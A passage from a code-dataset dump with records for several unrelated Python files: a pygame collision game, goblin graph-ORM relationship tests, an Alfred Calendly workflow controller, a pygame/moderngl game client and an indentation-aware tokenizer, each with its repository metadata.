event.type == pygame.QUIT:\r\n run = False\r\n\r\n keys = pygame.key.get_pressed()\r\n \r\n #Red Player Movement Key Mapping wasd\r\n if keys[pygame.K_a]:\r\n if x_red > 0:\r\n x_red -= vel\r\n\r\n if keys[pygame.K_d]:\r\n if x_red < max_width-width:\r\n x_red += vel\r\n\r\n if keys[pygame.K_w]:\r\n if y_red > 0 :\r\n y_red -= vel\r\n\r\n if keys[pygame.K_s]:\r\n if y_red < max_height-height:\r\n y_red += vel\r\n\r\n #Blue Player Movement Key Mapping up,down,left,right arrow keys\r\n if keys[pygame.K_LEFT]:\r\n if x_blue >= -20 :\r\n x_blue -= vel\r\n\r\n if keys[pygame.K_RIGHT]:\r\n if x_blue < max_width-width : \r\n x_blue += vel\r\n\r\n if keys[pygame.K_UP]:\r\n if y_blue > 0 :\r\n y_blue -= vel\r\n\r\n if keys[pygame.K_DOWN]:\r\n if y_blue = max_width-width:\r\n print(\"RED WINS\")\r\n myfont1 = pygame.font.SysFont('Comic Sans MS', 60)\r\n textsurface = myfont1.render(\"RED WINS\", False, (255, 255, 255))\r\n win.blit(textsurface,(max_width/2 - 50,0))\r\n red_counter += 1\r\n #reset the player coordinates\r\n x_red = 50\r\n y_red = random.randint(50,450)\r\n y_red -= (y_red % 10)\r\n x_blue = 950\r\n y_blue = random.randint(50,450)\r\n y_blue -= (y_blue % 10)\r\n pygame.time.delay(1000) #delay in milliseconds\r\n win.fill((255,0,0))\r\n \r\n if x_blue <= -10:\r\n print(\"BLUE WINS\")\r\n myfont1 = pygame.font.SysFont('Comic Sans MS', 60)\r\n textsurface = myfont1.render(\"BLUE WINS\", False, (255, 255, 255))\r\n win.blit(textsurface,(max_width/2-50,0))\r\n blue_counter += 1\r\n #reset the player coordinates\r\n x_red = 50\r\n y_red = random.randint(50,450)\r\n y_red -= (y_red % 10)\r\n x_blue = 950\r\n y_blue = random.randint(50,450)\r\n y_blue -= (y_blue % 10)\r\n pygame.time.delay(1000) #delay in milliseconds\r\n win.fill((0,0,255))\r\n\r\n pygame.draw.rect(win, (255,0,0), player_red) \r\n pygame.draw.rect(win, (0,0,255), player_blue) \r\n # print(x_red,y_red)\r\n # print(x_blue,y_blue)\r\n pygame.display.update() \r\n\r\npygame.quit()", "repo_name": "agrawalparth08/collision-detection-pong", "sub_path": "collision_game.py", "file_name": "collision_game.py", "file_ext": "py", "file_size_in_byte": 3914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 86, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 91, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.font.SysFont", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 104, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 110, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 120, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 126, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 129, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 131, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 138, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "34814088884", "text": "from __future__ import unicode_literals\nfrom nose.plugins.attrib import attr\nfrom copy import deepcopy\n\nfrom tornado.testing import gen_test\nfrom goblin._compat import print_\nfrom goblin.models import Vertex, Edge\nfrom goblin.properties import String, Integer\nfrom goblin.exceptions import GoblinRelationshipException\nfrom goblin.tests.base import BaseGoblinTestCase, TestVertexModel, counter\nfrom goblin.relationships.relationship import Relationship\n\n\nclass TestRelationshipEdgeModel(Edge):\n label = 'test_relationship_edge_model'\n\n name = String(default='test_edge')\n test_val = Integer(default=counter)\n\n\nclass TestRelationshipStringPlaceholderVertexModel(Vertex):\n label = 'test_placeholder_inspection'\n\n name = String(default='test_vertex')\n test_val = Integer(default=counter)\n\n relation = Relationship(\n TestRelationshipEdgeModel,\n \"goblin.tests.relationships_tests.vertex_relationship_io_tests.AnotherTestVertexModel\",\n 'out')\n\n\nclass AnotherTestVertexModel(Vertex):\n label = 'another_test_vertex_model'\n name = String(default='test_vertex')\n test_val = Integer(default=counter)\n\n\nclass TestRelationshipVertexModel(Vertex):\n label = 'test_relationship_vertex_model'\n\n name = String(default='test_vertex')\n test_val = Integer(default=counter)\n\n relation = Relationship(TestRelationshipEdgeModel, TestVertexModel, 'out')\n\n\n@attr('unit', 'relationship')\nclass GraphRelationshipVertexIOTestCase(BaseGoblinTestCase):\n \"\"\" Test Relationship Vertex IO Functionality \"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(GraphRelationshipVertexIOTestCase, cls).setUpClass()\n cls.relationship_base_cls = Relationship\n cls.edge_model = TestRelationshipEdgeModel\n cls.vertex_model = TestRelationshipVertexModel\n cls.placeholder_model = TestRelationshipStringPlaceholderVertexModel\n\n @gen_test\n def test_instantiation(self):\n \"\"\" Test that the Relationship is properly Instantiated \"\"\"\n v1 = yield self.vertex_model.create(name='test relationship')\n try:\n # setup relationship\n self.assertIsNotNone(v1.relation.top_level_vertex_class)\n self.assertIsNotNone(v1.relation.top_level_vertex)\n self.assertEqual(v1.relation.top_level_vertex, v1)\n finally:\n yield v1.delete()\n\n @gen_test\n def test_follow_through(self):\n \"\"\" Test that the Relationship property functions \"\"\"\n\n v1 = yield self.vertex_model.create(name='test relationship')\n e1, v2 = yield v1.relation.create(\n vertex_params={'name': 'new relation'})\n try:\n stream = yield v1.outE(TestRelationshipEdgeModel)\n e1q = yield stream.read()\n e1q = e1q[0]\n stream = yield v1.outV(TestRelationshipEdgeModel)\n v2q = yield stream.read()\n v2q = v2q[0]\n self.assertEqual(e1, e1q)\n self.assertEqual(v2, v2q)\n finally:\n yield e1.delete()\n yield v1.delete()\n yield v2.delete()\n\n @gen_test\n def test_placeholder_inspection(self):\n \"\"\" Test that the Relationship property functions \"\"\"\n\n v1 = yield self.placeholder_model.create(name='test placeholder')\n e1, v2 = yield v1.relation.create(\n vertex_params={'name': 'another new relation'})\n try:\n stream = yield v1.outE(TestRelationshipEdgeModel)\n e1q = yield stream.read()\n e1q = e1q[0]\n stream = yield v1.outV(TestRelationshipEdgeModel)\n v2q = yield stream.read()\n v2q = v2q[0]\n self.assertEqual(e1, e1q)\n self.assertEqual(v2, v2q)\n finally:\n yield e1.delete()\n yield v1.delete()\n yield v2.delete()\n\n @attr('relationship_isolation')\n @gen_test\n def test_relationship_isolation(self):\n \"\"\" Test that the relationship adheres to instance methods \"\"\"\n\n v11 = yield self.vertex_model.create(name='test1')\n e1, v12 = yield v11.relation.create(\n vertex_params={'name': 'new_relation_1'})\n v21 = yield self.vertex_model.create(name='test2')\n e2, v22 = yield v21.relation.create(\n vertex_params={'name': 'new_relation_2'})\n try:\n stream = yield v11.relation.vertices()\n verts = yield stream.read()\n r11 = deepcopy(verts)\n print_(\"Vertex 1-1 relationships: {}\".format(r11))\n\n stream = yield v21.relation.vertices()\n verts = yield stream.read()\n r2 = deepcopy(verts)\n print_(\"Vertex 2-1 relationships: {}\".format(r2))\n\n with self.assertRaises(AssertionError):\n self.assertListEqual(r11, r2)\n\n stream = yield v11.relation.vertices()\n verts = yield stream.read()\n r12 = deepcopy(verts)\n print_(\"Vertex 1-1 relationships again: {}\".format(r12))\n with self.assertRaises(AssertionError):\n self.assertListEqual(r2, r12)\n\n self.assertListEqual(r11, r12)\n finally:\n yield v11.delete()\n yield v12.delete()\n yield v21.delete()\n yield v22.delete()\n", "repo_name": "ZEROFAIL/goblin-legacy", "sub_path": "goblin/tests/relationships_tests/vertex_relationship_io_tests.py", "file_name": "vertex_relationship_io_tests.py", "file_ext": "py", "file_size_in_byte": 5270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 23, "dataset": "github-code", "pt": "52", "api": [{"api_name": "goblin.models.Edge", "line_number": 14, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 17, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 18, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 18, "usage_type": "name"}, {"api_name": "goblin.models.Vertex", "line_number": 21, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 24, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 25, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 25, "usage_type": "name"}, {"api_name": "goblin.relationships.relationship.Relationship", "line_number": 27, "usage_type": "call"}, {"api_name": "goblin.models.Vertex", "line_number": 33, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 35, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 36, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 36, "usage_type": "name"}, {"api_name": "goblin.models.Vertex", "line_number": 39, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 42, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 43, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 43, "usage_type": "name"}, {"api_name": "goblin.relationships.relationship.Relationship", "line_number": 45, "usage_type": "call"}, {"api_name": "goblin.tests.base.TestVertexModel", "line_number": 45, "usage_type": "argument"}, {"api_name": "goblin.tests.base.BaseGoblinTestCase", "line_number": 49, "usage_type": "name"}, {"api_name": "goblin.relationships.relationship.Relationship", "line_number": 55, "usage_type": "name"}, {"api_name": "tornado.testing.gen_test", "line_number": 60, "usage_type": "name"}, {"api_name": "tornado.testing.gen_test", "line_number": 72, "usage_type": "name"}, {"api_name": "tornado.testing.gen_test", "line_number": 93, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 128, "usage_type": "call"}, {"api_name": "goblin._compat.print_", "line_number": 129, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 133, "usage_type": "call"}, {"api_name": "goblin._compat.print_", "line_number": 134, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 141, "usage_type": "call"}, {"api_name": "goblin._compat.print_", "line_number": 142, "usage_type": "call"}, {"api_name": "nose.plugins.attrib.attr", "line_number": 114, "usage_type": "call"}, {"api_name": "tornado.testing.gen_test", "line_number": 115, "usage_type": "name"}, {"api_name": "nose.plugins.attrib.attr", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "22673551299", "text": "#!/usr/bin/python\n# encoding: utf-8\nimport constants as c\nfrom calendly_client import CalendlyClient, CalendlyClientException\nfrom calendly_client import active_filter as ACTIVE_FILTER\n\nfrom workflow import Workflow3\n\nlog = Workflow3().logger\n\n\nclass Controller:\n calendly_client = None\n\n def __init__(self, wf):\n access_token = wf.get_password(c.ACCESS_TOKEN)\n self.calendly_client = CalendlyClient(access_token)\n self.stats = Stats(wf)\n self.wf = wf\n\n def create_single_use_link(self, event_type):\n try:\n link = self.calendly_client.create_link(event_type, 1)\n self.stats.increment(event_type)\n return link\n\n except CalendlyClientException:\n raise Exception(\"Request to create link failed.\")\n\n def get_current_user(self):\n user = self.calendly_client.get_current_user()\n if user is None:\n raise Exception(\"Failed loading Event Types. Could not determine current user.\")\n\n return user\n\n def cache_ordered_event_types(self):\n user = self.get_current_user()\n ordered_event_types = self.get_ordered_event_types(user)\n self.wf.cache_data(c.CACHE_EVENT_TYPES, ordered_event_types)\n\n def get_ordered_event_types(self, user):\n\n unordered_event_types = self.calendly_client.get_all_event_types_of_user(user, the_filter=ACTIVE_FILTER)\n if not unordered_event_types:\n return []\n\n event_stats = self.stats.get_stats()\n if not event_stats:\n return unordered_event_types\n\n for event_stats_item in event_stats.items():\n for i in range(len(unordered_event_types)):\n needle = unordered_event_types[i]\n if needle[\"uri\"] == event_stats_item[0]:\n unordered_event_types[i][\"event_stats\"] = event_stats_item[1]\n\n ordered_event_types = sorted(unordered_event_types, key=lambda event_type: event_type[\"event_stats\"] if \"event_stats\" in event_type else None, reverse=True)\n\n return ordered_event_types\n\n\nclass Stats:\n\n def __init__(self, wf):\n event_stats = wf.settings.get(c.CONF_EVENT_STATS)\n if event_stats is None:\n wf.settings[c.CONF_EVENT_STATS] = {}\n\n self.wf = wf\n\n def increment(self, event_type):\n log.debug(\"in: Incrementing Stats for %s\" % event_type)\n if event_type in self.wf.settings[c.CONF_EVENT_STATS]:\n current_count = self.wf.settings[c.CONF_EVENT_STATS][event_type]\n self.wf.settings[c.CONF_EVENT_STATS][event_type] = current_count + 1\n else:\n self.wf.settings[c.CONF_EVENT_STATS][event_type] = 1\n\n self.wf.settings.save()\n\n def get_stats(self):\n return self.wf.settings[c.CONF_EVENT_STATS]\n\n\n", "repo_name": "sebwarnke/alfred-calendly", "sub_path": "src/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 2787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "workflow.Workflow3", "line_number": 9, "usage_type": "call"}, {"api_name": "constants.ACCESS_TOKEN", "line_number": 16, "usage_type": "attribute"}, {"api_name": "calendly_client.CalendlyClient", "line_number": 17, "usage_type": "call"}, {"api_name": "calendly_client.CalendlyClientException", "line_number": 27, "usage_type": "name"}, {"api_name": "constants.CACHE_EVENT_TYPES", "line_number": 40, "usage_type": "attribute"}, {"api_name": "calendly_client.active_filter", "line_number": 44, "usage_type": "name"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 66, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 68, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 74, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 76, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 78, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 83, "usage_type": "attribute"}]} +{"seq_id": "5400179064", "text": "import pygame as pg\nimport moderngl as mgl\n\nfrom .pymgl.graphics_engine import GraphicsEngine\nfrom .pyfont.font import Font\n\nfrom .util.asset_loader import load_character_assets, load_attack_assets, load_keybinds, load_bgs\n\n# import menus #\nfrom .menus import *\n\n\nclass _Settings:\n RESOLUTION = (1280,720)\n MENU_MAP = {\n 'start': 0,\n 'main': 1,\n 'select': 2,\n 'fight': 3\n }\n\n\nclass Client:\n def __init__(self):\n self._pg_init()\n self._create_menus()\n self._asset_load_progress = 0\n self.finished_loading = False\n self._load_assets()\n \n def _pg_init(self):\n # init\n pg.init()\n\n # get window and ctx\n self.resolution = _Settings.RESOLUTION\n # self.screen = pg.display.set_mode(self.resolution)\n pg.display.set_mode(self.resolution, pg.OPENGL | pg.DOUBLEBUF)\n self.ctx = mgl.create_context()\n self.ctx.enable(mgl.BLEND)\n self.ctx.blend_func = (\n mgl.SRC_ALPHA, mgl.ONE_MINUS_SRC_ALPHA\n )\n pg.display.set_caption('The UW Experience')\n\n # get graphics engine, font, and displays\n self.graphics_engine = GraphicsEngine(self.ctx, self.resolution, './src')\n self.font = Font(pg.image.load('./src/pyfont/font.png').convert())\n self.displays = {\n 'default': pg.Surface(self.resolution),\n 'gaussian_blur': pg.Surface(self.resolution),\n 'black_alpha': pg.Surface(self.resolution)\n }\n self.displays['gaussian_blur'].set_colorkey((0,0,0))\n self.displays['black_alpha'].set_colorkey((0,0,0))\n\n # clock\n self.clock = pg.time.Clock()\n\n def _create_menus(self):\n # menus\n self.menus : list[Menu] = [\n StartMenu(self), \n MainMenu(self),\n SelectMenu(self),\n FightMenu(self)\n ]\n self.current_menu = 0\n \n def _load_assets(self):\n if self._asset_load_progress == 0:\n # cursor\n pg.mouse.set_visible(False)\n self.cursor = pg.image.load('./assets/ui/cursor.png').convert()\n self.cursor.set_colorkey((0,0,0))\n \n keybinds = load_keybinds()\n self.keybinds = {\n 'f1': {key: pg.key.key_code(keybinds['f1'][key]) for key in keybinds['f1']},\n 'f2': {key: pg.key.key_code(keybinds['f2'][key]) for key in keybinds['f2']},\n }\n\n self.bgs = {}\n self.bg_thumbs = {}\n self.character_assets = {}\n self.accessory_assets = {}\n self.attack_assets = {}\n\n bgs, bg_thumbs = load_bgs(progress=self._asset_load_progress)\n self.bgs = {\n **self.bgs,\n **bgs\n }\n self.bg_thumbs = {\n **self.bg_thumbs,\n **bg_thumbs\n }\n \n # assets\n character_assets, accessory_assets = load_character_assets(scale=3, progress=self._asset_load_progress)\n self.character_assets = {\n **self.character_assets,\n **character_assets\n }\n self.accessory_assets = {\n **self.accessory_assets,\n **accessory_assets\n }\n attack_assets = load_attack_assets(scale=3, progress=self._asset_load_progress)\n self.attack_assets = {\n **self.attack_assets,\n **attack_assets\n }\n\n if (\n not bgs and\n not character_assets and\n not accessory_assets and \n not attack_assets\n ):\n self.finished_loading = True\n\n self._asset_load_progress += 1\n\n def update(self):\n dt = self.clock.get_time() / 1000\n events = pg.event.get()\n\n for event in events:\n if event.type == pg.QUIT:\n return {\n 'exit': True\n }\n if event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE:\n return {\n 'exit': True\n }\n \n if not self.finished_loading:\n self._load_assets()\n self.menus[self.current_menu].transition_time = 0\n \n return self.menus[self.current_menu].update(events, dt)\n\n def render(self):\n self.ctx.clear(0.08, 0.1, 0.2)\n displays_to_render = self.menus[self.current_menu].render()\n if not self.finished_loading:\n self.font.render(\n self.displays['black_alpha'],\n f\"loading{'.' * (self._asset_load_progress % 3 + 1)}\",\n self.resolution[0] / 2 - 125,\n self.resolution[1] / 2,\n (255,255,255),\n 25,\n style='left'\n )\n [\n self.graphics_engine.render(\n self.displays[display], \n self.displays[display].get_rect(), \n shader=display\n ) \n for display in displays_to_render\n ]\n # [self.screen.blit(self.displays[display], (0,0)) for display in displays_to_render]\n \n def run(self):\n self.menus[self.current_menu].on_load()\n while True:\n exit_status = self.update()\n if exit_status:\n if exit_status['exit']:\n pg.quit()\n return\n else:\n if exit_status['goto'] == 'fight':\n self.menus[_Settings.MENU_MAP['fight']].reset_fight_data()\n self.menus[_Settings.MENU_MAP['fight']].get_fight_data(self.menus[_Settings.MENU_MAP['select']])\n if exit_status['goto'] == 'select':\n self.menus[_Settings.MENU_MAP['select']].reset_meta_data()\n\n self.current_menu = _Settings.MENU_MAP[exit_status['goto']]\n self.menus[self.current_menu].on_load()\n \n self.render()\n self.clock.tick()\n pg.display.flip()\n", "repo_name": "HuMangoPP/theUWexp", "sub_path": "src/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 6010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.OPENGL", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.DOUBLEBUF", "line_number": 38, "usage_type": "attribute"}, {"api_name": "moderngl.create_context", "line_number": 39, "usage_type": "call"}, {"api_name": "moderngl.BLEND", "line_number": 40, "usage_type": "attribute"}, {"api_name": "moderngl.SRC_ALPHA", "line_number": 42, "usage_type": "attribute"}, {"api_name": "moderngl.ONE_MINUS_SRC_ALPHA", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pymgl.graphics_engine.GraphicsEngine", "line_number": 47, "usage_type": "call"}, {"api_name": "pyfont.font.Font", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_visible", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "util.asset_loader.load_keybinds", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.key.key_code", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.key.key_code", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 80, "usage_type": "attribute"}, {"api_name": "util.asset_loader.load_bgs", "line_number": 89, "usage_type": "call"}, {"api_name": "util.asset_loader.load_character_assets", "line_number": 100, "usage_type": "call"}, {"api_name": "util.asset_loader.load_attack_assets", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 127, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 130, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 174, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 188, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 188, "usage_type": "attribute"}]} +{"seq_id": "8376421883", "text": "from __future__ import annotations\n\nimport collections\nfrom typing import Iterator, Optional\n\nfrom gvm.language.grammar import Grammar, TokenID\nfrom gvm.language.syntax import SyntaxToken\nfrom gvm.locations import Location\n\n\nclass Scanner:\n \"\"\"\n This class is implemented tokenizer, that tokenize input stream to tokens.\n\n This tokenizer returns all tokens from source text, e.g. trivia, errors and e.t.c\n \"\"\"\n\n eof_id: TokenID\n error_id: TokenID\n\n def __init__(self, grammar: Grammar, filename: str, content: str):\n self.grammar = grammar\n self.position = 0\n self.buffer = content\n self.length = len(self.buffer)\n self.location = Location(filename)\n self.eof_id = grammar.tokens['']\n self.error_id = grammar.tokens['']\n\n def tokenize(self) -> Iterator[SyntaxToken]:\n while self.position < self.length:\n token = self.__match()\n if token:\n yield token\n\n yield SyntaxToken(self.eof_id, \"\", self.location)\n\n def __match(self) -> Optional[SyntaxToken]:\n self.location.columns(1)\n self.location = self.location.step()\n\n # match patterns\n results = ((pattern.token_id, pattern.match(self.buffer, self.position)) for pattern in self.grammar.patterns)\n results = tuple((token_id, match) for token_id, match in results if match)\n if results:\n max_position = max(match.end() for _, match in results)\n token_id, match = next((token_id, match) for token_id, match in results if match.end() == max_position)\n position = match.end()\n value = self.buffer[self.position:position]\n else:\n # match operators\n value = self.buffer[self.position]\n token_id = self.error_id\n self.position += 1\n\n self.position += len(value)\n location = self.__consume_location(value)\n return SyntaxToken(token_id, value, location)\n\n def __consume_location(self, value):\n for c in value[:-1]:\n if c == '\\n':\n self.location = self.location.lines(1)\n elif len(value) > 1:\n self.location = self.location.columns(1)\n location = self.location\n if value[-1] == '\\n':\n self.location = self.location.lines(1)\n else:\n self.location = self.location.columns(1)\n return location\n\n def __iter__(self):\n return self.tokenize()\n\n\nclass DefaultScanner(Scanner):\n \"\"\" This class is implemented tokenizer, that skipped trivia tokens from output tokens \"\"\"\n\n def tokenize(self) -> Iterator[SyntaxToken]:\n for token in super().tokenize():\n if token.id not in self.grammar.trivia:\n yield token\n\n\nclass IndentationScanner(Scanner):\n \"\"\"\n This class is implemented tokenizer, that tracks indentations in source text (offset rule) and\n appended `indent` and `dedent` tokens to output tokens. Also skipped trivia tokens\n \"\"\"\n\n def __init__(self, grammar: Grammar, filename: str, content: str):\n super().__init__(grammar, filename, content)\n\n self.newline_id = grammar.add_token('NewLine')\n self.whitespace_id = grammar.add_token('Whitespace')\n self.indent_id = grammar.add_token('Indent')\n self.dedent_id = grammar.add_token('Dedend')\n\n def tokenize(self) -> Iterator[SyntaxToken]:\n indentations = collections.deque([0])\n is_new = True # new line\n whitespace = None\n level = 0 # disable indentation\n\n for token in super().tokenize():\n # new line\n if token.id == self.newline_id:\n if level:\n continue\n\n if not is_new:\n yield token\n\n is_new = True\n continue\n\n elif token.id == self.whitespace_id:\n if is_new:\n whitespace = token\n continue\n\n elif token.id == self.eof_id:\n location = Location(token.location.filename, token.location.end, token.location.end)\n\n if not is_new:\n yield SyntaxToken(self.newline_id, '', location)\n\n while indentations[-1] > 0:\n yield SyntaxToken(self.dedent_id, '', location)\n indentations.pop()\n\n yield token\n continue\n\n elif token.id in self.grammar.trivia:\n continue\n\n if is_new:\n if whitespace:\n indent = len(whitespace.value)\n location = whitespace.location\n whitespace = None\n else:\n indent = 0\n location = Location(token.location.filename, token.location.begin, token.location.begin)\n\n if indentations[-1] < indent:\n yield SyntaxToken(self.indent_id, '', location)\n indentations.append(indent)\n else:\n while indentations[-1] > indent:\n yield SyntaxToken(self.indent_id, '', location)\n indentations.pop()\n\n is_new = False\n if token.id in self.grammar.open_brackets:\n level += 1\n elif token.id in self.grammar.close_brackets:\n level -= 1\n\n yield token\n", "repo_name": "alurin/gvm", "sub_path": "gvm/language/scanner.py", "file_name": "scanner.py", "file_ext": "py", "file_size_in_byte": 5457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gvm.language.grammar.TokenID", "line_number": 18, "usage_type": "name"}, {"api_name": "gvm.language.grammar.TokenID", "line_number": 19, "usage_type": "name"}, {"api_name": "gvm.language.grammar.Grammar", "line_number": 21, "usage_type": "name"}, {"api_name": "gvm.locations.Location", "line_number": 26, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 30, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 30, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 38, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 80, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 80, "usage_type": "name"}, {"api_name": "gvm.language.grammar.Grammar", "line_number": 92, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 101, "usage_type": "call"}, {"api_name": "gvm.locations.Location", "line_number": 124, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", 